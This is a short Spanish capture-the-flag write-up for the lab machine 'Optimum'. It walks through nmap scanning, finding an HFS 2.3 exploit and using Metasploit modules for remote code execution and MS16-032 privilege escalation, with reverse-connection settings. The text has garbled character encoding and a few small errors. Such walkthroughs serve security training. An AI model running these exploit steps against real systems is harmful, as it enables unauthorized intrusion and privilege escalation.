# Optimum
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.10.8
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.10.8
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 80 (HTTP):** Este puerto generalmente est谩 asociado a servidores web. Si el servicio est谩 ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a trav茅s de CVEs). Adem谩s, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p80 -v 10.10.10.8
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Buscamos exploits sobre esa versi贸n.
```bash
searchsploit HFS 2.3
```
### 馃殌 **EXPLOTACI脫N**
Explotamos a trav茅s de Metasploit.
```bash
use windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST 10.10.14.7
run
background
```
Estamos dentro del Usuario Kostas por lo que podemos conseguir la flag del user. Buscamos a trav茅s de Metasploit que exploit nos recomienda.
### 馃攼 **PRIVILEGIOS**
```bash
use multi/recon/local_exploit_suggerster
```
Descubrimos uno que nos llama la atenci贸n para explotarlo.
{% embed url="" %}
```bash
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST 10.10.14.7
set session 1
exploit
```
```bash
getuid
```
Ya somos **root**.
